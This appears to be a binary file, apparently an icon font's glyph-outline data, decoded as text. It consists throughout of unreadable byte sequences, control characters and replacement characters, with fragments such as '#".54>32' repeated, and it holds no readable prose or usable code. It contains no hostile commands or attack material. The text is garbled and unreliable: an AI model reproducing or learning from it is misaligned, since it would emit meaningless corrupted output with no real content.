J")gjg)%]a]%T!TVT!JNJ�@CA676$-/,#%#


�$b����i%--/1 	�e?L?
���ANA
��6����!.C�%>&/3!!3'!!#'7"&'267'>&'.67.'0.'>14.#"7.#0"72>3067>7>&'s
U�g�6�3M!�>cDJ?I���J #$# �JL "
	
!"	Q '�5�
M��"Z��j�xIJJI!��;)	L2:
	



7����3Mg�����7Qk����32+".=4>31;2+".=4>31!32+".=4>31!32+".=4>31;2+".=4>3132+".=4>31;2+".=4>31!32+".=4>31!32+".=4>31;2+".=4>31%32+".=4>31#32+".=4>31!32+".=4>31;2+".=4>31!2#!".=4>31.'&34>7>23310:12>=#09!30:612>=#013�O

O

�OO

�|O

O

�}N

N
�OO

�O

O

�O

O

�|O

O�}OO

�O

O

�O

O

�O

O�}OO

�O

O

��

�p�"Z����`#�*),-�
;E;
�_
<H<	�O
=

=

=

=

=

=

=

=

=

=
��<

<<

<<

<<

<<

<�
==

==

==

==
��
;;
�>?10@A


V

D

D!����#(6@U���&4>?626.'.>7'!!#".54>;4>3!!57#".54>32'.+">7>./733.'.47>?'36?>&'#".'#32>5<&'#'>323.#"33/73*\
\
�6��$�������####6�
6	~
	d'Li	L'e�	

	F''FG		<;{"%3

2760#����@�
�@	�`�""##�

�

T	
BN?2




2?NB
	T

b&&

		���737373737!####!����
������7����[�������k�
#8=B��%#".=3#5##5!#".=32#".54>3!!!!32#".'0#<1#".54>;5#".54>;5#".54>;5#".54>;5#".54>;5332+32+32+32+!"!.#)

	
_~�-�>��


`�-""--""-_�A�n� ��X

/

X\\ggaaLL/LLaagg\\y��$!
	$6



**rDD�*



**!-.!!.-!����ey��X�		a

	���I;P`��2>54.#"30" "#"1032(12>4150.+"#732>54.#"%35801!'.'.>7*1";3.54>;7#"!>54.#%".'&4>?'5#0>7>;2�""##���(\
\!J



��	L�+���?-3;0

�?��

j
�uy�
		

��

�)#gdq>L@

!B��""""��
M
�



�
�e�>

	
_	
		
 


K

2c
U%gmDSF"&�6����-<AZ_di#'>54.+35326:3373'7'#532#3!2>5!!!'!2>=4.#!"3%3#5#3#5#3#5�$&1	

"f3.E9$'&5A8�%!

�

�
	�7-o��D��
�78�DZ#���}fFFve.p

��

����T���vvvvvv	���R�z���$Xm2>'6.#"3".3.032>732>746&6'6.'&"&""#".5&6&6'>7.+"#63">323">##".'6&6&7#.7&>7'3'33##'#'4>?>22"3#".'".7&>32#3".'>32#7".7&6465>47.'.7"2"6#>76#2>7.#"3�

)
	


�##!%	3F&(D4SCLCAJA�
	
	
�&&$$�$$%%�
		
!
�

�
		
[

		F		#


'E33E'


#�oKBBKBB	 :50


	$7$��%%%%%%%%�		


05: $7$/
		
����2G\q�������%'7>'6.'7'7''77#*3!'2*#"32>7.#".'>32#':3&6&6'*#7"32>'6.#73#".'>32#7".7&>32#7".'>32#".7&>32#7".'>32#i���)*>$oG��#=!s*'E[5"I:&<'.��/V?%%?V/2T@$$@T2-L:!!:L-+N9""9N+z

{(B33B(%D00D%�KMP	

	

-			

	




A			

			

			q�(�t9@F%.VL@�0)0�#;#;�.7>!4\D(__�%@U01U?%%?U10U@%�B!:M,,M:!!:M,,M:!��2C&&C22C&&C2�NN�



T��

p���!���>56.#&'.'6&64?''7>7'3>/&4./7223>74.'.1.4/.'>'6.� 

�	�i
Hn	
~
	
Z
	#*!	
#'%)
7		

 �		/�
24+

���

k&&IO@	���	
�

�\


	F[����*?Tif{!5#".=#".5<64?0>7>32"32>54.#%32>54.#"%32>54.#"75'.'7'.'&"&"1'#'5'.'7'.'0*/#"'"730:337>77'>506<5772213'17:23372>77'>706<?5'.'7'.'"&*#'#7>77'>74646532>54.#"�h< 6)3PEcyAP�h<&6!��				r	

	��		�:8"(/8	0(!0%$ &%% 8"(/10(!�		��u)7k�%'6cL-<h�P-VMB/		]		,	

	Y
8
1(!;8"'/ &%% '%.
0(!;4"'/�	

	
����(IV[`ej���.54>76754.'%.54>765'5557%%%%%%.54>7'%%.54>7'2 ����������@AA@@@��;��t��t���Ssoos��Ssooa�<����B@??AAi��7�<6��p8����V����V���� Qg5##335352>54.#"35"#".54>7>;2#*./!717'.>5'76�kkkkk�1$$10%%0�w�"�"�w�dΚ'5(��(5'�;kkjkkj��$11$$11$��v!


��
!vR384 �CC� 483	����)-1FUYu�"32>54.#3"32>54.#37%37%2>54.#"333##!'!'.#"!7>4'"&"&'.?3#1�

�

��/-.���J!0!#..##.�*�SS��I%B�_71U�"8+�~�Q/t9
	m��R���#//##//#�	����5�V���Ƙ#
�

���
����2Gg%'7>7.'7'7''77#*#!7*#'3'#3#'3'#3#!#!332>'332>733^���*/?)xN��$@%|. +Hb7&L?'_,/��YBZb�a?��B
BA��*�{<DK(1[QD�3-3�?%?�1:B#8aI*ffQQQQ�l���O��


��


�������=Rg�".54>32#.'#!#'.7>130%"32>54.#.67>&'&'.'.1.'.>7>1>7'"./.>76201/""//##/\
b0����0b

e54&�'36e

��'F33F''E44E')		
*
	



	�#..##..#��		X��$��		`5885���4E('E44E'(E4�
		@

#7,

����%2G\�6"./!&>;227#7##337372>7.#"32>'6.#"3"'7''7'77>733#

�

B��c
h	*:8�@K?=I>,##,/  /�.!!.,##,'G�
"�H�
	���'
23��!--)�>>K>>KL"--""--""--""--"!
'B'��

&���:����!�%>&/3!!3'!!#''32#".'#5#".54>;5#".54>;5#".54>;5#".54>;5#".54>;5332+32+32+32+r

T�n�5�2M!�C]DI��P�������P������V &�9�
L��#X��o�M2 0 (#bb#(!0 2333333<����#=Ubk%>&/3!!3'/!!#'+#32'.+32>7>'6.'%#3#3#3%##'#'3n
U�u�4�6!�GVD�
<;x

.	64	=������T:T�X &�>�
N��6Q"X��s@9e
fS
	<1H3222��24����#E���%>&/3!!3'/!!#'3#5<5<5#'#37#.5.4&=4.'.+#3232>7>54.'.+#3m

U�l�6�6!�A_C�V76:58W43D
A	
:;�

{@	A;;S '�8�
O��7R"Y��m@�������


	
	p*M
	���7����#v��%>&/3!!3'/!!#'>32#.'.#"32>7>73#".'.54>7%3#'##3'%##5#53q

T�k�6�6!�@aD�a	
<

;


	
	
	=DeAi?fI$%�U<V�U '�7�N��7R#Y��l@�	
	

	
		


!
��::�pp�2��28����#v%>&/3!!3'/!!#'>32#.'.#"32>7>73#".'.54>7%##5#53r

T�l�6�6 �B_D��	
;	

;

	
	
	�U<V�U '�8�
N��6R#Y��mA�

	
	



!
2��2����@U#5#4.#"67>73!2>54.'535".54>32#zw#
	&"			*
)(	')x'���
		
		l,
	
!


#):'��V':)*,�+ 

		

����FRg|��k21!#+".54>;7>3332>54.'52>5##".532#".54>32>54.#"3'2>54.#"3#2>54.#"332>5<13032>5<13032>=4.#0*1/."1#0"'."1#0">573332>=332>=3'332>573032>5<13032>5<1331j 2"��G
��i
 		
}?****��

		�


		�




Y	]H
)%$)
%�!/��]j	
�*<'�
	�'=*+44+**  **



�	


	




��6<1A	d44eb�yyyy�bbUi[4;..;4[iU_�����+9Fh�����*32>7.#%!!!!!!#'3#3#33#7#'#73733#73#3#33#'6&4&1##726:3207#".'>32.#"32>47'#'3#73#3#33#'1#'33'3".'>32.#"32>7#7#7'373�
����IJJ����BB&$"*z^C?("$(g


l	
	


*ZD@("$(o+(I
	
		g$ �(uI������HI� %V22V�22�� %/5�

6:



:� %RR�NN�
		532S<<R��>�:Uw�������	0%4.#!"13!2>51'!!4>76"&/&>'65'>/."?#0*1".=4>30:121#26=+26=7#".54>32#0*1".=4>30:121#26=+26=7#".54>32#0*1".=4>30:121#26=+26=7#".54>32>�?
�
T�D�o .on-�� -
on
-�&!%+& 



d%!&,& d%!&+&



�

�@
��Gi�8
��
9����8
��
9��gkk�



��



��

�kk�



��



��

�kk�



��



��

[����i~����<o����."#;6&>7>7>32+;37&>323'>323>'6.#2#".7&>3&>7>32#*1".'#".7&>;2#32+".7&>3>762#0"&"5.674>#*&0#.'.5#*.5.'.74>74>3>7630"1".'2"2"3.'.47.'.467>2"*#".5#".'7&6&4'4>727.'.>7>0"1".'&4.'4>76#2"2"3".'#".7'>32732>7.+'32+(@yaEN


)3:X&� 6%<f�M��



-		N//		//m
	
	}	
	^		

	
	8		)	
**�,Kb6&%�		J3&tBALU.N�g;��				��5
	*��
�		
_	
	�
		
_

j..G"
"))�����	u������2G\q��#'0&467!'#".54>32'5<6454.#*5""1532>5<''02857532>54.'7#".54>32#".54>32'4>32#".5#".54>32#".54>32#".54>32#".54>323#".54>325#".54>327#".54>327#".54>327#".54>32#".54>327#".54>32���2�""""Rg"�	
��		
�$X
$ '$^����""""�ti�"t���el�
	
	�R'&$!(�����	322>#>722>#>322:#2">3&>72">34>32":37>7.#"3".#"".5".'3#.7".'3#".'".'*3".'2.'##.'2.'##".'2.'*#3">7#XY


	


	
>Z=Uh57eW9Z; �	
		



7�}UX}�6G�		|}]:SY 
#,*		|}]:SY 
#,*DKL!*YI.CQCCPC-GY,&RK?( (?M%.n^@ (?M%.n^@`�o<<o�`����)>{����2>54.#"3%2>54.#"3"32>54.##5.535.'.54>753#4.#'.54>7533'33'.+"37%23##".5<5##".5<55!<1.?>;�

E��&C22C&&C33C&,/
,
.
,
	-_#�$$D,!| +D$�-\

	

	
�Q����



�G2C'&C22C&'C2��
7
4	�+g/3����

��l�X��	

	
izllzi
	

	Ee|?Y+K8 ���YX���>2:32>#7>'7"2&2#6.'.'.#"*#.'.&'>7.3'#*.'.'#.'>7332>'6.'>32#".7'#".7'332>'73�	
�		
	"!##(39"B:)	%"=
�		2-2; 95+�5@F&@tT2&=R,.
!#!			4

H
�
4
1(��),1UsA5dQ9
1DD��##



l�&;Pe���5354>323##".54>32#4.#"32>5%#".54>32#4.#"32>5+4.#"!4.#"#".54>3!2'3'#5##33535#		�F""""1
	

	
�"##"1
	

	
�E!,-!��!-,!9
�J��E��iiiiii�
		
�""##				""##	

	


 }
-!!--!!-
�
	�����iihiih����3Mb���76.'.''>7>7.'7>7>'&>54.'.'&>7>./?7.'.47>?'76?>&'4>7'.56$5>45.'%-777&&57'%.54>77&%>54.'�

"%

"%			
	�%"

!!!!�.�.m
V"B
[
B"V
m&



��
%W
[!���mLg{

d
�tw�
		

_((%)&'�
		

 !

!!

H

	

%('4" 

 "���

�
I
:B8*

	
,6D8	G
	�  �
L		�lk
wvxwnq	

	

 	


����=]j�#".54>32%#".54>;232#54.+"#!".54>;232'5##33535#2!#+".54>;7>37� *+  +* �� ����������@@@@AA<+ �xI
��k
 !�u*  **  *��=����@@A@@A�+�Tcm	


�����P�����54>32#5<>?>323<>5>?>54.'!54.#"35<./.#"#<.5./.54>72>54.#"3#".54>32#2>54.#"3*#0."1'.1#0'.1#0>?3332>=332>=3'332>74>4373032>5<13032>5<130281232>5<13032>5<13032>5<54.#�
	

���i"j
��

���i"j
�		

�			

	�-	#
q
X
$#2-,2"!	
	
!

�����

!N�pt
����

!N�pt
�					

	�z		<<		{x����wwh�o		@G88G@		o�hxCI=#&&#AI<��KQ���!!5%#54.+".'.67.'.54>3"72;23#54.+".'.>7>54.#52323#5;#5U���.
{#3"#


{- G.%7#I
*";+"-G1u..H--��>

		
2'- 
	
		
)>T7,		&.(7 "8H$T��������cx��'.54>754.'&0457>=>577>5>=40405%>54.&4&4&'.'001>?>577>523>'7' 

l�								�H
�F

8d^

		
^d8

��88`�'
)������



p��r�



����
��
	�����		��		y�	��)���0?#"&5".5462354623546235462%"&5#462�
"'! !
 !'"83=2t��#
-


��	


��	


��	


���Q----7����Nr�����"Bb�����?_#5>54.#"13>;#"33!334.#%#".'.74>7>7#.74>32#.454>7>"#".'".54>32#5".54>32#6.'.5&>3&'&>2".'&4>7>""#1'".'&4>7>76*9*.#.67>#12>7>.'.3172>74.#";1':67>&'.31'2>7>.'.2312>7>746.'.31'12>54.#"3172>7>4&5.'.:317:>7>&'.31�s5H(">3#)~5X?!�-�/�9S5�	C1	'				_/
|

/;			�				5	�			6		ч"',(H5'3g$<M(������IB6"�	�		S�>e@heK��	
Ae=Keh	M	M	��		OP	>		�OP>	����-D���>7>75&>54.&''.'7'&"&5'.'.'.'.'&7>5<5742>?476..54>67'�6</(*52	�+

	




z))*G9#�#9G*�I
		
3	

	6 "


n



%���4;-&(1.@U�����	����/"("	
���}Kn{0�
			k�������)>SXm����c"32>54.#".54>32#:3<5*#7"32>54.#53#".54>32#7".54>32#7".54>32#".54>32#7".54>32#54.#"374./.#"#4&4&'./.54>7!54>32#5<>?>323<>5>?>54.'CvW33WvCBvX22XvB=jP..Pj=<kO//Ok<��5\E((E\55\E((E\5�jjm@		%				\��

���	j"l	
	�	��	j#l�3WvBCvW33WvCBvW3��.Ok=<kO..Ok<=kO.:�(E\54]E((E]45\E(�kk�				u���				�

��		��
�
"P�	r
v
�		��
�
"P�	r
v
����
 +6ALPTXc�6.'>.'4>74>754>76.'56.'!%3'-'0704.'#".'.1.54>32>320#".'{"
(
"	'"	'"	'"
("
(L�[������|
���0*21v	

	('
	
-*,#_,% -*$
�*-"y*-"�*-"�*,#y*-#��m��0����1��(.$"*&�]


((


���U�2FZ#".54>32#5.?>;2/#?>&'".1!/.670>1�&43''34&��s*�

�

�(v��qSU)�
	#��pRT)�
	$,4&&43''3�Jls(�
	�'vm8pSU)�$pSU)�$���~�����;2354.+".'.467>4&'.#".'.54>735;2354.+>54.'5#"3#5;#5"32>54.#'35#>32!4>7#!#".5

Q		Q	
0$ /%!�0��h��OO��hh��OO��h�
~)���5:= Q�j>��
�X�59= P�j=�
		))





$


$77/%
$&	!	�[[[[O��hh��OO��hh��O�	 =:5ZH
>j�Q =95�Z�
=j�P]����.CHMRWaQ"1;;3533>54.#".54>32#3#553#53#53#53#5#54>7>7302627>4'1.'>58401<.5>7>4&'.".'4>7>4&'.".54.#"#*.'81.'.".'&""#8+"2306261>;2>72232>7&"&"#"30:61>3:322326265>4&'1.584184014>738201812."#"27>32"001#54.'.'#".'#".54>7>3:3>32>32>2632'@xbDO	3(6;�Y^!5&;g�N��		OYYYYYYYYZY�
	%	
	



	


		
!				
			#	


$	
 


	
�,Kb5'%�i6)t44ABLT-N�f;�6				��00E00�11E11%0

!m
	



	








	

	



mh$	
	

���Bm��!!5%4>32#".5'#3.54>;7#"3!2>54.#2>54.#"3>32#".'#3"73>32#".'#32>54.##0*&1.".'4>7>2
���a��L�rt�
	�@pS11Sp@*MC8�
"%+L9!!9L+
�5>F%O�wX;_?LZ0F{\66\{F,RH=�Yq�Ic��JJ��cl--,011~<<~O�	

		
�U1Sq?@pT0'6!
!9L,+L9!, 1VxG	(A/5\|FF{\5(7"?jL*K��cb��Kl�k)6CP]jw�����B�2#".54>32#".54>3>7.767.767.76.'%>&'>4'>'>5''".54>32#327>/.1#02>?33'%2>5*#33032>5<54.#*###".54>75".5*#"32>5<13351%##".5##".5##".=4>;2#".=�				e�z	
2CN
I	
	TI	7				9*	+j+	)7�7�I		
		
		��	

	
�
?				,�

S	
F
	 		
(:|
�\�	��	���

+60092	<<	29006+�����		Z��		.�������_�2>54.#"3*#54>'.#.5<15.'0>&'#";2+";2+".54>;2>54.+".54>;2>54.+".54>;28132>4150"&>7>75*#"32>5<13!3032>5<54.#�2&&22&&2�	 +3 

		
$#	�



��



���	

	��		$
		 
0)%B3

	2v2

	0@$�%22%%22%*�BE5
�		
	

	


	



	
�
5EB �/@%��z


{�m�0�m�{


z��%@/	����4KU���.�#5!#4>312!54>322#".54>3+".54>;2%2!5!%4.#"#".54.#"32>54>323'30>54.1#01380103>5!!4>;2#'4.#"0.14.#"0.14."#0*#.14.#"0.14.#"0.14."+51#".=:31232>50>7132>50>7130:31232>50>7132>50>71;#�Z��[		
*		��

E	
b

b
		���	



	

r"X#�x�� 

�

	
�


"

8��=

���

�
�		
		
��� <		




��`

		!!��fR



�1
"#//

"#//��

6	#*

	#*


6

����5Uly�����4>32#".5%2!5!2>54.+";34.#"!4.#1"35!2.#"'>33535#5##3#".54>32"3733'33'.+".54>32#152>54.#"315""&'.4'54>32176211��	����		a		aY
	��		Y��	"

#
J







}77((�()67|�j3''34&&4''''6F�

*���				���		�2

�Εa

C	@
C_







R������)&44&&44&#''''XS@!����)_d#".54>32"32>54.#4>3230<54>7>.'.30<55#3�L��ed��LL��de��L�N�g;;g�NN�f;;f�Nc$'p!'	%!$LB2
&$l�pp�e��MM��ed��LL��dy;g�NN�f;;f�NN�g;��(	*& o%# BA< 6M5	
�Jrr����)>Sh}����'<Qf{�����>4'.67764.'.>77>.'.>764.'.>77>.'.>7>&'."267.'&4>7>.'.>7>*#"32>'6&6&;37333232>7&6&6'6.#.'&4>7>.'.>7>'"&'.>7>27"'.67>7"32>7.#>&'.47.47>&'&'.47>7&'.67>''.45>'.74>''.5>32>?64.'&'.'&37#
!&,
(*�		�
	D		�		�			>
	�		-P[O6'

	&(&		%4�		D	
�					�))''5				E	
&
	�		
��

S	
	
12

)"?�4$�	 '+		 '+	w	u		'	M	yJ	N	+&3fra
	

	blV����Vlb	

	
arf3&2	'		�H	Z(''(%[	4<	 		X		�		�	�	
	�\
	�
��2�A
b��{�R���������2#".54>3232>=4>54.#"#".54>32#".'.'.#"#".54>3'77'77'77'77'77'7'77'7
CuV3
&-;!!;-


"3=3(F]5 91+


5YxC	/UA&
		
%*'"

	

#<Q.�{vu;vu=vvGvvBvuCvuK/0>/0�4XvC-((006"G!8*+:!

 O;XQW;5]F(%CuX2b"<Q0	

	
	
.Q=$�vu;vv>vuEvu>vvIvv0/?00����!!!!!!]GG������G+GGG����/����/D_t���.�7".54>32#<54>3:32!%2>54.#"3<54.#*#"!%".54>32#7>130!5'!!!2>54.#"30.1.1#0010:32>?13:232>?3302623>/5313:61>45%".54>32#02>7>45#21;2>7>7354.#"1#".54>750".'.5#"#'."�



�
		 ��/





�
		 �&

�444����x��D�
		

		
t		V		0000�	F��
[	
	�
	7Sup�



�#)&		&)#�





�#)&		&)#�



�

�ǜ��3���


		

�$$]j����j]



b:
�� 	CD
Rup`����"'BOUbw������
%7'7'77775'75'7%.54>7>'7.6775>?&4'.54>77>54.&54&'&4>7>7>7>&'.54.54>5>54.'54.'.'.'.5���LL*DB!"AB)ILCLL�LL�LL�LL��d�

;G;�

�,o�'��~���)l    F!!!!;

	

 2 

	


	


	

 

	

1

	

 3��\<93dgib07=E_aa_���)��'X��3:��0�2��.
	

!
2
!;" 

 "G!

!<!2!
����)>!s��K2>54.#"3!".54>32##".54>32*#0.1'.1#0'.1#0>?3332>=332>=33332>72>4?3032>5<13032>5<1382132>5<13032>5<13032>5<54.#.'.'.'"&*#*"#2>3232>75#".''23>75>72:3:6355.#"4.#.'#".'32>72:3:63500>7532>74.#.'5.'0015"&*#*#".'4060=.'.#">31*		��				e

"
,�n,	+?8



6>+*				)
				v*+-.+*)))))(	.01
		
*))	
10-�?()*



10-�46910-468

H								�



:�KK�	����

��

������
		
QXGGXQ
		
����T[K		,0%%0,		Q\J!
�� #.

Uy��" C# "�uU	' 

Su��vU	'"�����!!!!!!������6e5y7�����7	����E������.%."'7>4&'."'7>4&'."'7>4&'."<54.1!717>4&'"1;7>27>2!>54.#".54>32#2#".54>3".54>32#.5>3#7".54>32#".54>32#7#532>54.+532#�

��

��
��

�
	I��>t_BM
.!� 4$:c�L���(






'*((���
��
��
�
dxb�

,H_4%$�.!e7?JR+L�c:�B		_uP


p



:l!!'(���y�P232>7>.7>'.'&#".32>&'.47>3*#%" %@?C((C?@% "%$	*�%3
)VG-)E\32L=1*RV]5, 

 ,5]VR*1=L23\E)-GV)
3%���#9H*#1!3!2>=:32>54.#*#5:32##!".=!'��%k%%A11A%((�%��%���%%.@%%?.���&'�$$���l�$'!54>10!''#54>10zww�#�NR



�6����u���(

(�Au~B"		"B
����?T}!!'.3:32>'2&6&7.#3'7>32#".''!3.4'>;7#"!>'6.#9��e:I:
���	W��p
�FsU..VrF@h����
�{}�	+ 5AA�*3.

���m��G

29.pNm�JJ�mNc9



U.z		
!	

����+8OT'.54>7>67.'''5'57577''.#'7%%5�$01##10$�576I"''"H5987#)"")#�"0y0"0oK&5"�"6'Mp0���$w1""1/%%/B	�

�	d#!("$*������)#%'���_]g����*S32>7'#".'.7&>7'!'3'#'27>'.#!7'%:*!47<7aQ8
6	0AR+0/)!1w8�����	"	1J�h!:FP*;83"#?W5
,H3
*.1#B900��^6�!	!�G��(3���������7".1!01#./&&'81'.*"#"32>7>200*#%35#7#33535#5#".54>10#/>7>.'.'"#'.7>7>/.7>01U�����
	b!%!


	Jdf�}}/////+$*$#+#+�

�	�
H��aw
v
��AB

		


 :  �....�"*ZS;;SZ*"V

	
�	




�
	
s����#3!3#!B�����}��C�x� ����o�Q��2>54.#"32#".5<1#!#0#".5<54>3:3.454>7>54.#"32>5<&4'.'32>7>54.'.#"3&&33&&3�%B1	
	4��3	

	4D%fug�




[



	

�&33&&33&*1A%��|

		
}�o�(�o�}
		

|��%A1�	
	


	
	

	
	


	
	���=Wv�%"./7>32#172>7>54.'.#"3%.'>7.'.54>7>772>54.#"3�J�~m))m~�JJ�l))l�J


(6�HR[1/"	1\SI��	

1^UJKU_25







�$Eb>		>cD$$Dc>	?bE$~


6(�)E6&
,6@"/+'


&6F)�

'+/.+'

&6F**G6&
�







���-Vv�!"3!2>54.#2#".54>3.'#!#'.7>130%"#33535#5>54.#".54>32#z�1$$1�1$$1��$$##	
K%x�Ax%K
	
N)'�')M
	��, %$$$%%%!,�$1�1$$1�1$m$$$$�w�]���	
	(++(��	
	� ,( !%$$%! (, �

����7Pe����*@"32>'6.#*'2&4&3'64>30726%!"3!2>76.#2#".7&>37>;2#"./.67>>5246&5".'7'3#6?>#".'.65'77&>32#".7#".'7&>;23#".'7&>32/.74>'+737&>;2�54(b�2"$0�/%#1��	�&�
&j

>
ca<	gE�13N��'%%'��
1
�f
	

�	
�
�
�6	1
/



F?1�$0�0$$0�0$���rr
	I	.EE.	I	
*#86&&'&��	�		wx6		�		��	
					�	xw		�	
����8Qjx����0"$""3!2>54.#".7>7"37+0*153209+0*1532097'5>4&'7>&'7'>&'7'1'>4&'71'>4&'7����*)(

*�554&'33
	
[773








*
�+��()*��N�nh�I�
%#!"��/80��1:0(


"#!
(*(020*
7:8
>A>EHFMPL����iv���.67>&'0.'464614.#"74.0"72>3067>7>&'4.'&>73!!'%7267"&'!"3!2>54.###'./!!�
			M	<			�
:5�['�/��:���:��1$$1�1$$1B'�*�}��				b	;'-			

����E��

�9::9�$0�0%%0�0$�e

q<
t.��
����5Ng������/Hd}����0& ""3!2>54.#+".=4>;22+".=4>;'54>;2+".54>;2+".=7".=4>;2+754>;2+".54>;2+".=7".=4>;2+754>;2+".54>;2+".=7".=4>;2+#0*9".510<13%#4.'."#4>3#0*9".510<14>;2+".=54>;2+".5#!".=4>3!27+".=4>;2����*
((
*D88�888888W8807788W8828888W77y*3+���[r@�
 
	�Dy`�ʪ)2)8888>�0�H88�
*��(

)*�^++m++B++�++@++�++�++@++�++�++@++0�"-,
	..!�0{++��++x**x++		����/Pt�����!"3!2>54.#2#.#"#>3332>73#".5<647.>7'"<637266.'#".54>32!54>3!5#".54>;'.>?'##>7>4'./7#&/.6?>;2.'#53}�
.##-�.##.��
/	
.
Q67

��%+(!HH��Y	��



�O<S<O
c*	�
*c
 ���#.�
.##.�.#v

D

�+*&'(���L	e~



|�

3>2'

'2>3

A

	x	

	x	

A�������10" "1"3!2>54.######5353535353����*))
*����ҍ�����+��)
)*��I����H	�����������!!#32+32#".'0#<1"#".54>;5#".54>;5#".54>;5#".54>;5#".54>;5332+32+32#!"3!2>54.#2#".54>332!>3#".=3#5##5!7".=31#7!!�z�]TJJH
		&
	HJJTTOO>>&>>OOT�0$$0�0$$0��$$$$q��Q)Nn%n@N\��:��|

0%0�0$$0�0%X%$$%��

""]776
""
pM������-Wg���!"3!2>54.#2#".54>3>;2".'&4>?'5#0>7#'7>782177'#".54>30:3?32+".54>;7'#"!".54>70" "#".1504>3:12>;210#'".54>32#y�1$$1�1$$1�wmd
4s
	j POY1;3�d;	!�<�1|


&/(
"3�



�

t_\r	��

�����۵	I
&





�$1�0%%0�1$��~+'NCQV6A8��	P�[J




	
1







	�		

<	
	�





	����	*8=B[j�3#5!!1'#7'*+#53273##32>54.#73#5;#57!"3!2>54.##!".5!#!".=4>3!2IE��E+4#'N&+2)p
�*�1$$1�1$$1�
��
]��-[[�����55N`f�
E4MZ U

�[[[[�$1�1$$1�1$��		S��zcc
����ez����)>S�".1."03:>732>146<54.'"&"#"0#".5<5>54.+"""#'2>54.#"332>54.#"3!"3!2>54.#610>3210>+#".5<647#".54>7153533##5#'&>?>281#".'".54>32#3".54>32##".5<>7>454.'.5814>36�


	 y9�0$$0�0$$0��



(66(


A4:55:4�

	


	�



��		





G			G,$0�0$$0�0$s

	6))6	��;44;44-*&	
		+��



+		
	&*-
����)>Sl�������"32>54.#"32>54.#"32>54.#7"32>54.#%!"3!2>54.#4>32#".5'7!50:32>54.'''7'7:#"32>7.#'#37*#&6&6':37"32>'6.#".7&>32#2		4ms
		
�0$$0�0$$0��1C&&B22B&&C1*���@.9)H6
"[0�8
W1 !%��
		
%=;
		=#<..<#!>,,>!5&&53((3		�k�$0�0$$0�0$��&C11C&&C11C&��ii��K5H)0+$�./v	&!%�2;D$72-Kh-<<0





�-=""=--=""=-��(44''44(����-��!"3!2>54.#>'.7'".#0.'.'4.1.'0.'.''.77#".5<>70>7>3;2>54.'7321'+7v�0$$0�1$$1�O
	
	C	!J		
g	
Z:	

T�
�	

+
	
	"!�	�$0�1$$1�0$�	
	
���x�	

	3@: ��
p

!+(
	%		r
{{

:����#8Rq��.'>7>7.'.'>67>7.'>7>7.'.'%%>76../7>6V	


",








�&
'MD=<CM'��
(OE>?FO)
9�1#%/�/%#1"![gv=?tiY##Yit?=vg[!	


	+#


^




�#.4'#!
	

.8#!:, �'""
		.9$";, 
%%�%/�/%#1�1#�4Q99Q43R88R3���C@Uj�!"3!2>54.#!5#".=#".5<64?0>7>32.'0"&"#'#'5'.'7'.#0&"0#'#"'"170:137>77'>7<0457702233'017:337>77'>70464175'4.'7'.'*&#'#7>77'>74646575'4.'7'".54>32#2#".54>3'".54>32#"32>54.#|�0%%0�0%%0���0+!(?
6O`4?nS/+%-& &-%'


& .- ��		
						��

		�%0�0%%0�0%�t��] ,T	�
*O<$0Ro?$D=5�/- %$'/

* %,'s				�		�				*	
		
	���� ,C\�����32>54.+"3!!5!5!%##33535#32>54.+"3!"3!2>54.##".=4>;232#54.+"!".=4>;2321#!!!!5!5!�XX��8���233233GXX�0$$0�0$$0�o��nT��o����e��8��:z������33223\$0�0$$0�0$���0���
��L��wQ�����	����-:k�!"3!2>'.#2#".'>373733##7#"./!'#".7&>?>;2#767'.>''w�/%#1�1#%/��''%%�LSTSUVU�]��]
���
�F
!(
{x *���$0�0$$0�0$�&&&&"UTTUTT��]]
	��	
}	*,	((	,*	}55����-2v��!"3!2>7.#2#".'>33#'#7#!7##0*&1.?373!'.657!7>;7'&>7633%&>32#".73>32#".'q�/%#1�1%'/��"
$!!���6n�<�1�v0!'	#Q#(��)�<"
		%[�<�F
		
n				�$1�1$%0�0$�""""�ᰰ������
uuui
&
l�
	
��y�1�















����7LQ�#".=##".=#35#%!"3!2>54.#35#'3#35#53#3!'7!50:32>54.'''7'7:1l	
3

1�0�1$$1�1$$1�KD3DJ�����7/9*I7 
"]0�:Y0# % ��

��

���$0�0$$0�0$��0====��Sk l��L 6J*1,%�//~&!'�3=E$93-L����-Vk��!"3!2>54.#2#".54>3.'#!#'.7>130%"32>54.#&'.'.1.'.>7>1>7'./.>7>01037&'.47>2y�1$$1�1$$1��$$$$
J%x�Bx%K


M)'�((M
	��5''54((4?
	
	




	
	�$1�1$$1�1$l$##$�z�_���	

(**(��

	�(45''54(�

	)"	
	@	

		����7o���.#"32>7>'4.'>54.#"32>5<&5.'.54>7!"3!2>54.#2#".54>3#".5<1#!#0#".5<54>3:32t	
		�	
	��0$$0�0$$0��))))&


)��)



)7S^S4(





(






�$0�0$$0�0$V))))�



epZ��}Zpe




dwi4''4iwd
����-Sz��!"3!2>76.#2#".7&>3>;2"76"./!!##&'.47''7''777>;".7&>32###33737#w�1#%/�/%#1��  ""aJ!)+	_u	1i��ׄn	�3

�6u\##!!�7/-5-/�%0�1$$1�0%�!!!!�&�! 	%%��|�
0
	��#!!!!�.7..7�������&>7'/7'6.''5"'.54>275.54>75'.54>75.54>75'.54>756'7'6&7>54.''/./%%�
:5�['�yyu
>
	uyy����dd>dd����0$$0�0%%0C
(�+�~�y
���F�)'%!NL
')')')'l#1�1$&/�/%�d	r;	
s.������&@MVo�.+32>7>54.'&>73!!'%+#532#53#3#373##5#5%!"3!2>54.###'./!!\++a5�['��	/.`
ު�vll|�B/D�1$$1�1$$1B
*�*�}��B��@+2��E�Q�
	
a�(/'9)�(��(�$0�0%%0�0$�e

s>t/������
4����&>77%%'5'5<5<1''577'4.14.4=4.'.''57221'&"&"'6>7>54.'%%>54.'./�"5�^$..��+*-*+D((C�3-.k
	?32�0$$0�0$$0B*�*��w
?^��Dc�����������X�		�;	%0�0%#2�2#�i

q>t-������ajsv��&>7'%7>7>7.'.'>7>6'.'.'/'?'?7'%%>'.'./�
4�Z&�b
	-
		
	
.	
*R0O6N2%�D0Dy8f�0%#2�2#%0C
+�
)�|�y
?,1��F�		
						
4-/���)'��bY%/�/&$1�1#�fr?u0������-<��!"3!2>54.###'./!!'&>73!!'%32>7>73#".'.54>7>32#.'.#"#5#53#y�1$$1�1$$1B*�*�}ϭ
5�['��		

.
	

/			/C�C�$0�0%%0�0$�e

s>
t/��Z@+2��E�



	


	
5�((�
����)0" "1"3!2>54.####3353����)()

)��������+��))*����|������1r#".54>32%0" "1"3!2>54.#'5#+".54>75.7>7.54>323357�

